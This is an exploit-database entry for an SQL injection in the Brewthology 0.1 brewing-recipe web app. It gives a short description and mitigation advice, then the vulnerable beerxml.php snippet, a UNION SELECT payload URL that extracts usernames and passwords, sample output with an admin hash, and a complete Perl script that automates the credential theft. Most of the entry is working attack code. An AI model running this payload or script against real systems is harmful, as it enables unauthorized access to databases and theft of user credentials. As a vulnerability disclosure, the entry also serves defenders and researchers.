Brewthology 0.1 SQL Injection Exploit

vendor:

Brewthology

by:

cr4wl3r

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Brewthology

Affected Version From: 0.1

Affected Version To: 0.1

Patch Exists: NO

Related CWE: N/A

CPE: a:brewthology:brewthology:0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2013

Brewthology 0.1 SQL Injection Exploit

A SQL injection vulnerability exists in the Brewthology 0.1 application. The vulnerability is due to insufficient sanitization of user-supplied input in the 'r' parameter of the 'beerxml.php' script. An attacker can exploit this vulnerability to inject arbitrary SQL commands and gain access to sensitive information from the application database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are executed by the application. Parameterized queries should be used to ensure that user-supplied input is not interpreted as part of the command or query.

Source

Exploit-DB raw data:

#Brewthology 0.1 SQL Injection Exploit
#By cr4wl3r http://bastardlabs.info
#Script: http://sourceforge.net/projects/brewthology/files/brewthology/v0.1%20public%20beta/
#Demo: http://bastardlabs.info/demo/brewthology.png
#Tested: Win 7
#
# Bugs found in beerxml.php
#
# if (isset($_GET['r'])) 
# 	{ 
# 	$recipenum = $_GET['r']; 
# 
# // Pull Data from DB	
#    $recipes = "SELECT * FROM bxml_recipes WHERE reciperecid=$recipenum"; 
#    $recresult = @mysql_query ($recipes); 
#  }
#
# http://bastardlabs/[path]/beerxml.php?r=[SQLi]
# Example: http://bastardlabs/[path]/beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users
#
#
# $ perl brewthology.pl localhost /demo/
# [+] Please Wait ...
#
# [+] Getting Username and Password    [ ok ]
# [+] w00tw00t
# [+] Username | Password --> admin:ab4d8d2a5f480a137067da17100271cd176607a1

#!/usr/bin/perl

use IO::Socket;

$host = $ARGV[0];
$path = $ARGV[1];

if (@ARGV < 2) { 

print qq(
+---------------------------------------------+
|    Brewthology 0.1 SQL Injection Exploit    |
|                                             |
|            coded & exploited by cr4wl3r     |
|                 http://bastardlabs.info/    |
+---------------------------------------------+
                    -=[X]=-
   +---------------------------------------
    Usage :                                
                                           
    perl $0 <host> <path>                  
    ex : perl $0 127.0.0.1 /Brewthology/   
                                           
   +---------------------------------------
);
}

$target = "http://".$host.$path."/beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", 
PeerPort=>"80") || die "[-] Can't connect to Server   [ failed ]\n";
print "[+] Please Wait ...\n";
print $sock "GET $target HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: BastardLabs\n";
print $sock "Host: $host\n";
print $sock "Connection: close\n\n";
sleep 2;
while ($answer = <$sock>) {
if ($answer =~ /<USE>(.*?)<\/USE>/) {
print "\n[+] Getting Username and Password    [ ok ]\n";
sleep 1;
print "[+] w00tw00t\n";
print "[+] Username | Password --> $1\n";
exit();
}
}
print "[-] Exploit Failed !\n";